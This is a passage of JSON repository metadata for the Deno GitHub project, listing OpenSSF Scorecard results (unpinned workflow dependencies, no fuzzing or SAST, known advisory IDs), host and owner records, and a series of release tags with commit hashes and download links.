https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"